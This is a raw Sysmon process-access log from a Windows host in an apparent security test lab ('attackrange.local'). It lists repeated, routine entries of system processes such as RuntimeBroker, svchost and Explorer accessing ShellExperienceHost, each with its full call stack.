14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000079604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000079602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000079600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000079598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000079596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43486892C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\combase.dll+24fe2|C:\Windows\System32\combase.dll+25d0e|C:\Windows\System32\combase.dll+25b1f|C:\Windows\System32\combase.dll+58e58|C:\Windows\System32\combase.dll+58a70|C:\Windows\System32\combase.dll+65aa7|C:\Windows\System32\combase.dll+c2064|C:\Windows\System32\combase.dll+62ae1|C:\Windows\System32\combase.dll+642c0|C:\Windows\System32\combase.dll+217a|C:\Windows\System32\RPCRT4.dll+da374|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000079593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000079590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000079588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000079587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e